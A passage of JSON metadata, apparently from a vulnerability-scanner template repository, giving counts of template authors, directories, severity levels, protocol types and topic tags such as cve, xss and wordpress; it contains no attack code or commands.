lenb","count":9},{"name":"righettod","count":9},{"name":"iamthefrogy","count":8},{"name":"melbadry9","count":8},{"name":"hackergautam","count":8},{"name":"nadino","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"0x240x23elu","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"dr_set","count":7},{"name":"r3dg33k","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"harshbothra_","count":7},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"joanbono","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"pentest_swissky","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":4},{"name":"iamnoooob","count":4},{"name":"xelkomy","count":4},{"name":"rootxharsh","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"meme-lord","count":4},{"name":"github.com/its0x08","count":4},{"name":"yash anand @yashanand155","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"thomas_from_offensity","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bp0lr","count":2},{"name":"x1m_martijn","count":2},{"name":"0xrudra","count":2},{"name":"w4cky_","count":2},{"name":"0xsapra","count":2},{"name":"bsysop","count":2},{"name":"random-robbie","count":2},{"name":"manas_harsh","count":2},{"name":"shifacyclewala","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"unstabl3","count":2},{"name":"udit_thakkur","count":2},{"name":"nkxxkn","count":2},{"name":"swissky","count":2},{"name":"afaq","count":2},{"name":"ree4pwn","count":2},{"name":"dheerajmadhukar","count":2},{"name":"randomrobbie","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"emenalf","count":2},{"name":"incogbyte","count":2},{"name":"gevakun","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"davidmckennirey","count":2},{"name":"zomsop82","count":2},{"name":"0xcrypto","count":2},{"name":"fabaff","count":2},{"name":"joeldeleep","count":2},{"name":"ehsahil","count":2},{"name":"lu4nx","count":2},{"name":"amsda","count":2},{"name":"kiblyn11","count":2},{"name":"bing0o","count":2},{"name":"foulenzer","count":2},{"name":"hetroublemakr","count":2},{"name":"alph4byt3","count":1},{"name":"fmunozs","count":1},{"name":"becivells","count":1},{"name":"luci","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"mah3sec_","count":1},{"name":"thezakman","count":1},{"name":"b0yd","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"smaranchand","count":1},{"name":"juicypotato1","count":1},{"name":"willd96","count":1},{"name":"alifathi-h1","count":1},{"name":"omarkurt","count":1},{"name":"j33n1k4","count":1},{"name":"bolli95","count":1},{"name":"dogasantos","count":1},{"name":"remonsec","count":1},{"name":"alperenkesk","count":1},{"name":"andysvints","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"_c0wb0y_","count":1},{"name":"sicksec","count":1},{"name":"petruknisme","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"@dwisiswant0","count":1},{"name":"naglinagli","count":1},{"name":"s1r1u5_","count":1},{"name":"elmahdi","count":1},{"name":"deena","count":1},{"name":"_harleo","count":1},{"name":"gboddin","count":1},{"name":"nytr0gen","count":1},{"name":"luskabol","count":1},{"name":"divya_mudgal","count":1},{"name":"undefl0w","count":1},{"name":"d0rkerdevil","count":1},{"name":"tim_koopmans","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"0xtavian","count":1},{"name":"0ut0fb4nd","count":1},{"name":"regala_","count":1},{"name":"hanlaomo","count":1},{"name":"0xrod","count":1},{"name":"rodnt","count":1},{"name":"co0nan","count":1},{"name":"sy3omda","count":1},{"name":"revblock","count":1},{"name":"ilovebinbash","count":1},{"name":"jteles","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"tirtha_mandal","count":1},{"name":"abison_binoy","count":1},{"name":"0xteles","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"ahmed sherif","count":1},{"name":"streetofhackerr007","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"un-fmunozs","count":1},{"name":"shelld3v","count":1},{"name":"_darrenmartyn","count":1},{"name":"pdp","count":1},{"name":"whynotke","count":1},{"name":"0h1in9e","count":1},{"name":"mohammedsaneem","count":1},{"name":"flag007","count":1},{"name":"r3naissance","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"raesene","count":1},{"name":"mhdsamx","count":1},{"name":"jeya seelan","count":1},{"name":"yashgoti","count":1},{"name":"gal nagli","count":1},{"name":"kabirsuda","count":1},{"name":"vzamanillo","count":1},{"name":"makyotox","count":1},{"name":"andirrahmani1","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"pudsec","count":1},{"name":"patralos","count":1},{"name":"qlkwej","count":1},{"name":"zandros0","count":1},{"name":"aresx","count":1},{"name":"vsh00t","count":1},{"name":"blckraven","count":1},{"name":"arcc","count":1},{"name":"rojanrijal","count":1},{"name":"taielab","count":1},{"name":"shifacyclewla","count":1},{"name":"affix","count":1},{"name":"kurohost","count":1},{"name":"furkansenan","count":1},{"name":"fopina","count":1},{"name":"ooooooo_q","count":1},{"name":"ipanda","count":1},{"name":"52971","count":1},{"name":"sickwell","count":1},{"name":"manuelbua","count":1},{"name":"dawid czarnecki","count":1},{"name":"noamrathaus","count":1},{"name":"notsoevilweasel","count":1},{"name":"schniggie","count":1},{"name":"johnjhacking","count":1},{"name":"berkdusunur","count":1},{"name":"daviey","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"akash.c","count":1},{"name":"akshansh","count":1},{"name":"zhenwarx","count":1},{"name":"chron0x","count":1},{"name":"yashanand155","count":1},{"name":"geraldino2","count":1},{"name":"cookiehanhoan","count":1},{"name":"johnk3r","count":1},{"name":"ringo","count":1},{"name":"kareemse1im","count":1},{"name":"ohlinge","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"iampritam","count":1},{"name":"toufik airane","count":1},{"name":"thevillagehacker","count":1},{"name":"idealphase","count":1},{"name":"defr0ggy","count":1},{"name":"ajaysenr","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"yavolo","count":1},{"name":"rtcms","count":1},{"name":"micha3lb3n","count":1},{"name":"mubassirpatel","count":1},{"name":"its0x08","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"retr0","count":1},{"name":"exploitation","count":1},{"name":"bjhulst","count":1},{"name":"th3.d1p4k","count":1},{"name":"b4uh0lz","count":1},{"name":"sullo","count":1},{"name":"bernardofsr","count":1},{"name":"shreyapohekar","count":1},{"name":"apt-mirror","count":1},{"name":"ldionmarcil","count":1},{"name":"hakluke","count":1},{"name":"knassar702","count":1},{"name":"bad5ect0r","count":1},{"name":"wabafet","count":1},{"name":"absshax","count":1},{"name":"c3l3si4n","count":1},{"name":"sshell","count":1}],"directory":[{"name":"cves","count":518},{"name":"vulnerabilities","count":246},{"name":"exposed-panels","count":204},{"name":"exposures","count":168},{"name":"technologies","count":136},{"name":"misconfiguration","count":115},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":42},{"name":"workflows","count":34},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":22},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":201},{"name":"low","count":147}],"types":[{"name":"http","count":1566},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":533},{"name":"panel","count":213},{"name":"xss","count":194},{"name":"wordpress","count":184},{"name":"exposure","count":178},{"name":"rce","count":177},{"name":"lfi","count":152},{"name":"cve2020","count":151},{"name":"wp-plugin","count":123},{"name":"tech","count":93},{"name":"config","count":90},{"name":"cve2021","count":84},{"name":"cve2019","count":84},{"name":"takeover","count":72},{"name":"cve2018","count":67},{"name":"","count":66},{"name":"token","count":64},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"cve2017","count":45},{"name":"iot","count":44},{"name":"file","count":43},{"name":"unauth","count":42},{"name":"network","count":35},{"name":"oob","count":34},{"name":"sqli","count":34},{"name":"logs","count":29},{"name":"oracle","count":29},{"name":"workflow","count":29},{"name":"misc","count":27},{"name":"ssrf","count":27},{"name":"atlassian","count":26},{"name":"jira","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":24},{"name":"listing","count":23},{"name":"redirect","count":21},{"name":"aem","count":19},{"name":"cisco","count":18},{"name":"cve2015","count":16},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"struts","count":13},{"name":"android","count":13},{"name":"cve2012","count":13},{"name":"misconfig","count":13},{"name":"fuzz","count":13},{"name":"auth-bypass","count":12},{"name":"dns","count":12},{"name":"cve2014","count":12},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"jenkins","count":11},{"name":"cve2011","count":11},{"name":"devops","count":10},{"name":"dlink","count":10},{"name":"cve2013","count":10},{"name":"php","count":10},{"name":"magento","count":9},{"name":"router","count":9},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"ftp","count":8},{"name":"aws","count":8},{"name":"gitlab","count":8},{"name":"xxe","count":7},{"name":"vmware","count":7},{"name":"cve2009","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"login","count":7},{"name":"joomla","count":7},{"name":"dell","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"coldfusion","count":6},{"name":"jetty","count":6},{"name":"citrix","count":6},{"name":"google","count":6},{"name":"api","count":6},{"name":"drupal","count":5},{"name":"confluence","count":5},{"name":"django","count":5},{"name":"phpmyadmin","count":5},{"name":"lucee","count":5},{"name":"ssti","count":5},{"name":"circarlife","count":5},{"name":"files","count":5},{"name":"iis","count":5},{"name":"dedecms","count":5},{"name":"fileupload","count":5},{"name":"laravel","count":5},{"name":"ruijie","count":5},{"name":"headless","count":5},{"name":"solr","count":5},{"name":"netgear","count":5},{"name":"ibm","count":5},{"name":"java","count":5},{"name":"samsung","count":4},{"name":"crlf","count":4},{"name":"tomcat","count":4},{"name":"docker","count":4},{"name":"elastic","count":4},{"name":"moodle","count":4},{"name":"asp","count":4},{"name":"jolokia","count":4},{"name":"thinkcmf","count":4},{"name":"vpn","count":4},{"name":"deserialization","count":4},{"name":"traversal","count":4},{"name":"magmi","count":4},{"name":"nodejs","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"webserver","count":4},{"name":"hongdian","count":4},{"name":"artifactory","count":4},{"name":"targa","count":3},{"name":"nosqli","count":3},{"name":"fanruan","count":3},{"name":"slack","count":3},{"name":"nacos","count":3},{"name":"ebs","count":3},{"name":"mongodb","count":3},{"name":"windows","count":3},{"name":"oa","count":3},{"name":"log","count":3},{"name":"ssh","count":3},{"name":"r-seenet","count":3},{"name":"cve2010","count":3},{"name":"hp","count":3},{"name":"lfr","count":3},{"name":"microstrategy","count":3},{"name":"amazon","count":3},{"name":"kafka","count":3},{"name":"terramaster","count":3},{"name":"git","count":3},{"name":"resin","count":3},{"name":"bitrix","count":3},{"name":"vbulletin","count":3},{"name":"caucho","count":3},{"name":"backups","count":3},{"name":"openssh","count":3},{"name":"fpd","count":3},{"name":"itop","count":3},{"name":"zabbix","count":3},{"name":"ofbiz","count":3},{"name":"grafana","count":3},{"name":"springcloud","count":3},{"name":"kubernetes","count":3},{"name":"printer","count":3},{"name":"bypass","count":3},{"name":"couchdb","count":2},{"name":"plesk","count":2},{"name":"service","count":2},{"name":"akamai","count":2},{"name":"sharepoint","count":2},{"name":"activemq","count":2},{"name":"horde","count":2},{"name":"strapi","count":2},{"name":"github","count":2},{"name":"huawei","count":2},{"name":"rstudio","count":2},{"name":"wordfence","count":2},{"name":"cve2008","count":2},{"name":"ecology","count":2},{"name":"dos","count":2},{"name":"kibana","count":2},{"name":"shellshock","count":2},{"name":"hashicorp","count":2},{"name":"voipmonitor","count":2},{"name":"chamilo","count":2},{"name":"phpcollab","count":2},{"name":"bigip","count":2},{"name":"hpe","count":2},{"name":"trixbox","count":2},{"name":"smtp","count":2},{"name":"keycloak","count":2},{"name":"prometheus","count":2},{"name":"seeyon","count":2},{"name":"injection","count":2},{"name":"sonarqube","count":2},{"name":"webcam","count":2},{"name":"saltstack","count":2},{"name":"mida","count":2},{"name":"leak","count":2},{"name":"rockethchat","count":2},{"name":"maian","count":2},{"name":"telerik","count":2},{"name":"globalprotect","count":2},{"name":"openfire","count":2},{"name":"status","count":2},{"name":"odoo","count":2},{"name":"xxljob","count":2},{"name":"flir","count":2},{"name":"igs","count":2},{"name":"smb","count":2},{"name":"waf","count":2},{"name":"zhiyuan","count":2},{"name":"natshell","count":2},{"name":"rockmongo","count":2},{"name":"yapi","count":2},{"name":"jsf","count":2},{"name":"fortios","count":2},{"name":"glassfish","count":2},{"name":"idrac","count":2},{"name":"cache","count":2},{"name":"nextjs","count":2},{"name":"mail","count":2},{"name":"jboss","count":2},{"name":"httpd","count":2},{"name":"pega","count":2},{"name":"microsoft","count":2},{"name":"kentico","count":2},{"name":"paloalto","count":2},{"name":"linkerd","count":2},{"name":"openam","count":2},{"name":"spark","count":2},{"name":"chiyu","count":2},{"name":"vrealize","count":2},{"name":"kevinlab","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"ucmdb","count":2},{"name":"hjtcloud","count":2},{"name":"nexus","count":2},{"name":"icewarp","count":2},{"name":"jellyfin","count":2},{"name":"cve2007","count":2},{"name":"intrusive","count":2},{"name":"sonicwall","count":2},{"name":"showdoc","count":2},{"name":"frp","count":2},{"name":"nagios","count":2},{"name":"proxy","count":2},{"name":"splunk","count":2},{"name":"emerge","count":2},{"name":"sureline","count":1},{"name":"jfrog","count":1},{"name":"ssl","count":1},{"name":"tpshop","count":1},{"name":"mobileiron","count":1},{"name":"wamp","count":1},{"name":"panos","count":1},{"name":"wavlink","count":1},{"name":"mcafee","count":1},{"name":"redhat","count":1},{"name":"tensorboard","count":1},{"name":"varnish","count":1},{"name":"openx","count":1},{"name":"mongo","count":1},{"name":"opencast","count":1},{"name":"kubeflow","count":1},{"name":"spf","count":1},{"name":"socomec","count":1},{"name":"jenzabar","count":1},{"name":"sceditor","count":1},{"name":"kyan","count":1},{"name":"glances","count":1},{"name":"nedi","count":1},{"name":"opentsdb","count":1},{"name":"flash","count":1},{"name":"goahead","count":1},{"name":"memcached","count":1},{"name":"nsasg","count":1},{"name":"postmessage","count":1},{"name":"exposures","count":1},{"name":"klog","count":1},{"name":"krweb","count":1},{"name":"nette","count":1},{"name":"emc","count":1},{"name":"camunda","count":1},{"name":"shopware","count":1},{"name":"pulsesecure","count":1},{"name":"linksys","count":1},{"name":"blue-ocean","count":1},{"name":"xvr","count":1},{"name":"weiphp","count":1},{"name":"phpunit","count":1},{"name":"monitorix","count":1},{"name":"circontrorl","count":1},{"name":"aura","count":1},{"name":"ecom","count":1},{"name":"ulterius","count":1},{"name":"payara","count":1},{"name":"scs","count":1},{"name":"vsphere","count":1},{"name":"discord","count":1},{"name":"htmli","count":1},{"name":"shopxo","count":1},{"name":"cerebro","count":1},{"name":"sidekiq","count":1},{"name":"commscope","count":1},{"name":"dvwa","count":1},{"name":"yachtcontrol","count":1},{"name":"pagespeed","count":1},{"name":"chevereto","count":1},{"name":"gridx","count":1},{"name":"solman","count":1},{"name":"bullwark","count":1},{"name":"circontrol","count":1},{"name":"enum","count":1},{"name":"centos","count":1},{"name":"expose","count":1},{"name":"webftp","count":1},{"name":"default","count":1},{"name":"triconsole","count":1},{"name":"realteo","count":1},{"name":"rsyncd","count":1},{"name":"netis","count":1},{"name":"dvr","count":1},{"name":"xdcms","count":1},{"name":"springframework","count":1},{"name":"cgi","count":1},{"name":"iptime","count":1},{"name":"wmt","count":1},{"name":"szhe","count":1},{"name":"clusterengine","count":1},{"name":"codemeter","count":1},{"name":"calendarix","count":1},{"name":"blackboard","count":1},{"name":"achecker","count":1},{"name":"esmtp","count":1},{"name":"gateone","count":1},{"name":"2014","count":1},{"name":"pippoint","count":1},{"name":"metinfo","count":1},{"name":"k8s","count":1},{"name":"fortigates","count":1},{"name":"starttls","count":1},{"name":"tongda","count":1},{"name":"setup","count":1},{"name":"spring","count":1},{"name":"eprints","count":1},{"name":"ambari","count":1},{"name":"rubedo","count":1},{"name":"rhymix","count":1},{"name":"moinmoin","count":1},{"name":"sourcebans","count":1},{"name":"lanproxy","count":1},{"name":"zookeeper","count":1},{"name":"subrion","count":1},{"name":"centreon","count":1},{"name":"acontent","count":1},{"name":"netsweeper","count":1},{"name":"openstack","count":1},{"name":"dom","count":1},{"name":"seacms","count":1},{"name":"synnefo","count":1},{"name":"concrete","count":1},{"name":"cacti","count":1},{"name":"oscommerce","count":1},{"name":"wp-theme","count":1},{"name":"ems","count":1},{"name":"geddy","count":1},{"name":"apiman","count":1},{"name":"gespage","count":1},{"name":"beanshell","count":1},{"name":"fiori","count":1},{"name":"feifeicms","count":1},{"name":"chinaunicom","count":1},{"name":"thinkadmin","count":1},{"name":"hortonworks","count":1},{"name":"adminer","count":1},{"name":"eyou","count":1},{"name":"tika","count":1},{"name":"bitly","count":1},{"name":"sangfor","count":1},{"name":"gloo","count":1},{"name":"wildfly","count":1},{"name":"dotnet","count":1},{"name":"openerp","count":1},{"name":"ganglia","count":1},{"name":"spip","count":1},{"name":"redis","count":1},{"name":"sgp","count":1},{"name":"rmc","count":1},{"name":"mailchimp","count":1},{"name":"wooyun","count":1},{"name":"vsftpd","count":1},{"name":"lighttpd","count":1},{"name":"apos","count":1},{"name":"portainer","count":1},{"name":"gitlist","count":1},{"name":"dlogin","count":1},{"name":"db","count":1},{"name":"gogs","count":1},{"name":"rmi","count":1},{"name":"nps","count":1},{"name":"cocoon","count":1},{"name":"xff","count":1},{"name":"cloudflare","count":1},{"name":"tensorflow","count":1},{"name":"optiLink","count":1},{"name":"ueditor","count":1},{"name":"openrestry","count":1},{"name":"keenetic","count":1},{"name":"javafaces","count":1},{"name":"h3c-imc","count":1},{"name":"cloudinary","count":1},{"name":"cse","count":1},{"name":"tamronos","count":1},{"name":"razor","count":1},{"name":"manageengine","count":1},{"name":"opensns","count":1},{"name":"majordomo2","count":1},{"name":"duomicms","count":1},{"name":"mdb","count":1},{"name":"darkstat","count":1},{"name":"spectracom","count":1},{"name":"phalcon","count":1},{"name":"saltapi","count":1},{"name":"landray","count":1},{"name":"npm","count":1},{"name":"moin","count":1},{"name":"biometrics","count":1},{"name":"lutron","count":1},{"name":"qvisdvr","count":1},{"name":"skywalking","count":1},{"name":"b2evolution","count":1},{"name":"qcubed","count":1},{"name":"fastapi","count":1},{"name":"sco","count":1},{"name":"zzzcms","count":1},{"name":"ricoh","count":1},{"name":"domxss","count":1},{"name":"bigbluebutton","count":1},{"name":"dotclear","count":1},{"name":"svnserve","count":1},{"name":"webmodule-ee","count":1},{"name":"alibaba","count":1},{"name":"harbor","count":1},{"name":"avalanche","count":1},{"name":"checkpoint","count":1},{"name":"74cms","count":1},{"name":"alertmanager","count":1},{"name":"wso2","count":1},{"name":"upnp","count":1},{"name":"rfi","count":1},{"name":"octoprint","count":1},{"name":"dnssec","count":1},{"name":"csod","count":1},{"name":"rdp","count":1},{"name":"sarg","count":1},{"name":"javascript","count":1},{"name":"sentry","count":1},{"name":"huijietong","count":1},{"name":"fortigate","count":1},{"name":"opensmtpd","count":1},{"name":"resourcespace","count":1},{"name":"turbocrm","count":1},{"name":"viewlinc","count":1},{"name":"floc","count":1},{"name":"wifisky","count":1},{"name":"emby","count":1},{"name":"ns","count":1},{"name":"lotuscms","count":1},{"name":"zcms","count":1},{"name":"traefik","count":1},{"name":"clink-office","count":1},{"name":"mantisbt","count":1},{"name":"idemia","count":1},{"name":"nuuo","count":1},{"name":"postgres","count":1},{"name":"symfony","count":1},{"name":"nc2","count":1},{"name":"sitecore","count":1},{"name":"interlib","count":1},{"name":"mirai","count":1},{"name":"wing-ftp","count":1},{"name":"akkadian","count":1},{"name":"vnc","count":1},{"name":"k8","count":1},{"name":"wondercms","count":1},{"name":"parentlink","count":1},{"name":"jquery","count":1},{"name":"openemr","count":1},{"name":"lancom","count":1},{"name":"webmin","count":1},{"name":"crm","count":1},{"name":"doh","count":1},{"name":"discourse","count":1},{"name":"plugin","count":1},{"name":"avtech","count":1},{"name":"monitorr","count":1},{"name":"zeroshell","count":1},{"name":"node-red-dashboard","count":1},{"name":"anchorcms","count":1},{"name":"finereport","count":1},{"name":"ec2","count":1},{"name":"appweb","count":1},{"name":"phpfusion","count":1},{"name":"liferay","count":1},{"name":"xmlchart","count":1},{"name":"magicflow","count":1},{"name":"webui","count":1},{"name":"myucms","count":1},{"name":"clockwatch","count":1},{"name":"smartsense","count":1},{"name":"bruteforce","count":1},{"name":"octobercms","count":1},{"name":"timeclock","count":1},{"name":"timesheet","count":1},{"name":"arl","count":1},{"name":"hadoop","count":1},{"name":"clave","count":1},{"name":"maccmsv10","count":1},{"name":"lansweeper","count":1},{"name":"kafdrop","count":1},{"name":"addpac","count":1},{"name":"soar","count":1},{"name":"rujjie","count":1},{"name":"erp-nc","count":1},{"name":"froxlor","count":1},{"name":"nordex","count":1},{"name":"redwood","count":1},{"name":"azure","count":1},{"name":"exacqvision","count":1},{"name":"rabbitmq","count":1},{"name":"wavemaker","count":1},{"name":"mediumish","count":1},{"name":"embedthis","count":1},{"name":"mantis","count":1},{"name":"powercreator","count":1},{"name":"netrc","count":1},{"name":"plastic","count":1},{"name":"stem","count":1},{"name":"st","count":1},{"name":"druid","count":1},{"name":"mariadb","count":1},{"name":"mara","count":1},{"name":"ntopng","count":1},{"name":"cve2005","count":1},{"name":"ssltls","count":1},{"name":"wiki","count":1},{"name":"xml","count":1},{"name":"dompdf","count":1},{"name":"backdoor","count":1},{"name":"robomongo","count":1},{"name":"episerver","count":1},{"name":"kong","count":1},{"name":"twitter-server","count":1},{"name":"nuxeo","count":1},{"name":"etouch","count":1},{"name":"javamelody","count":1},{"name":"upload","count":1},{"name":"plc","count":1},{"name":"yii","count":1},{"name":"totaljs","count":1},{"name":"fuelcms","count":1},{"name":"zte","count":1},{"name":"grav","count":1},{"name":"favicon","count":1},{"name":"redcap","count":1},{"name":"mysql","count":1},{"name":"exchange","count":1},{"name":"pyramid","count":1},{"name":"tileserver","count":1},{"name":"expressjs","count":1},{"name":"hasura","count":1},{"name":"zm","count":1},{"name":"fastcgi","count":1},{"name":"jitsi","count":1},{"name":"tenda","count":1},{"name":"cobub","count":1},{"name":"faraday","count":1},{"name":"blind","count":1},{"name":"linkedin","count":1},{"name":"wuzhicms","count":1},{"name":"spidercontrol","count":1},{"name":"zarafa","count":1},{"name":"flink","count":1},{"name":"fortiweb","count":1},{"name":"glpi","count":1},{"name":"selea","count":1},{"name":"panabit","count":1},{"name":"zenario","count":1},{"name":"acme","count":1},{"name":"labtech","count":1},{"name":"codeigniter","count":1},{"name":"bolt","count":1},{"name":"cors","count":1},{"name":"comodo","count":1},{"name":"accela","count":1},{"name":"csrf","count":1},{"name":"visualtools","count":1},{"name":"xunchi","count":1},{"name":"wazuh","count":1},{"name":"opm","count":1},{"name":"uwsgi","count":1},{"name":"dotnetnuke","count":1},{"name":"zmanda","count":1},{"name":"jeewms","count":1},{"name":"trilithic","count":1},{"name":"proftpd","count":1},{"name":"svn","count":1},{"name":"vscode","count":1},{"name":"visionhub","count":1},{"name":"axis","count":1},{"name":"pacsone","count":1},{"name":"nomad","count":1},{"name":"expn","count":1},{"name":"haproxy","count":1},{"name":"fortilogger","count":1},{"name":"lg-nas","count":1},{"name":"geutebruck","count":1},{"name":"zimbra","count":1},{"name":"getsimple","count":1},{"name":"sqlite","count":1},{"name":"node","count":1},{"name":"jmx","count":1},{"name":"mongoshake","count":1},{"name":"acexy","count":1},{"name":"servicedesk","count":1},{"name":"webadmin","count":1},{"name":"pgadmin","count":1},{"name":"mautic","count":1},{"name":"phpinfo","count":1},{"name":"bookstack","count":1},{"name":"firebase","count":1},{"name":"grails","count":1},{"name":"aruba","count":1},{"name":"drone","count":1},{"name":"enumeration","count":1},{"name":"email","count":1},{"name":"alerta","count":1},{"name":"livezilla","count":1},{"name":"jenkin","count":1},{"name":"xiuno","count":1},{"name":"empirecms","count":1},{"name":"ilo4","count":1},{"name":"fortinet","count":1},{"name":"tapestry","count":1},{"name":"salesforce","count":1},{"name":"aspnuke","count":1},{"name":"jnoj","count":1},{"name":" default-login","count":1},{"name":"plone","count":1},{"name":"sage","count":1},{"name":"ruckus","count":1},{"name":"landrayoa","count":1},{"name":"extractor","count":1},{"name":"jsp","count":1},{"name":"viewpoint","count":1},{"name":"hiboss","count":1},{"name":"bash","count":1},{"name":"zend","count":1},{"name":"fedora","count":1},{"name":"bedita","count":1},{"name":"scimono","count":1},{"name":"swagger","count":1},{"name":"woocomernce","count":1},{"name":"netdata","count":1},{"name":"kerbynet","count":1},{"name":"servicenow","count":1},{"name":"nexusdb","count":1},{"name":"auth","count":1},{"name":"ioncube","count":1},{"name":"heroku","count":1},{"name":"diris","count":1},{"name":"ruby","count":1},{"name":"primetek","count":1},{"name":"mpsec","count":1},{"name":"sprintful","count":1}],"authors":[{"name":"dhiyaneshdk","count":232},{"name":"pikpikcu","count":219},{"name":"pdteam","count":189},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":121},{"name":"daffainfo","count":108},{"name":"madrobot","count":60},{"name":"princechaddha","count":53},{"name":"gy741","count":50},{"name":"gaurang","count":42},{"name":"pussycat0x","count":36},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"philippedelteil","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":9},{"name":"nadino","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"hackergautam","count":8},{"name":"melbadry9","count":8},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"r3dg33k","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":5},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"xelkomy","count":4},{"name":"github.com/its0x08","count":4},{"name":"elsfa7110","count":4},{"name":"nodauf","count":4},{"name":"meme-lord","count":4},{"name":"e_schultze_","count":4},{"name":"rootxharsh","count":4},{"name":"iamnoooob","count":4},{"name":"fyoorer","count":3},{"name":"mavericknerd","count":3},{"name":"0w4ys","count":3},{"name":"_generic_human_","count":3},{"name":"tess","count":3},{"name":"shine","count":3},{"name":"impramodsargar","count":3},{"name":"z3bd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"dudez","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"binaryfigments","count":3},{"name":"jarijaas","count":3},{"name":"udit_thakkur","count":2},{"name":"bsysop","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"afaq","count":2},{"name":"bing0o","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xprial","count":2},{"name":"emenalf","count":2},{"name":"0xelkomy","count":2},{"name":"0xcrypto","count":2},{"name":"amsda","count":2},{"name":"joeldeleep","count":2},{"name":"davidmckennirey","count":2},{"name":"hetroublemakr","count":2},{"name":"ree4pwn","count":2},{"name":"zomsop82","count":2},{"name":"randomrobbie","count":2},{"name":"kiblyn11","count":2},{"name":"koti2","count":2},{"name":"pxmme1337","count":2},{"name":"vavkamil","count":2},{"name":"lotusdll","count":2},{"name":"fabaff","count":2},{"name":"0xsapra","count":2},{"name":"foulenzer","count":2},{"name":"bp0lr","count":2},{"name":"lu4nx","count":2},{"name":"x1m_martijn","count":2},{"name":"unstabl3","count":2},{"name":"gevakun","count":2},{"name":"nkxxkn","count":2},{"name":"w4cky_","count":2},{"name":"swissky","count":2},{"name":"manas_harsh","count":2},{"name":"hahwul","count":2},{"name":"ehsahil","count":2},{"name":"shifacyclewala","count":2},{"name":"incogbyte","count":2},{"name":"moritz nentwig","count":2},{"name":"0xrudra","count":2},{"name":"alifathi-h1","count":2},{"name":"random-robbie","count":2},{"name":"cookiehanhoan","count":1},{"name":"0xrod","count":1},{"name":"s1r1u5_","count":1},{"name":"b0yd","count":1},{"name":"bolli95","count":1},{"name":"flag007","count":1},{"name":"pudsec","count":1},{"name":"elder tao","count":1},{"name":"revblock","count":1},{"name":"d0rkerdevil","count":1},{"name":"daviey","count":1},{"name":"toufik 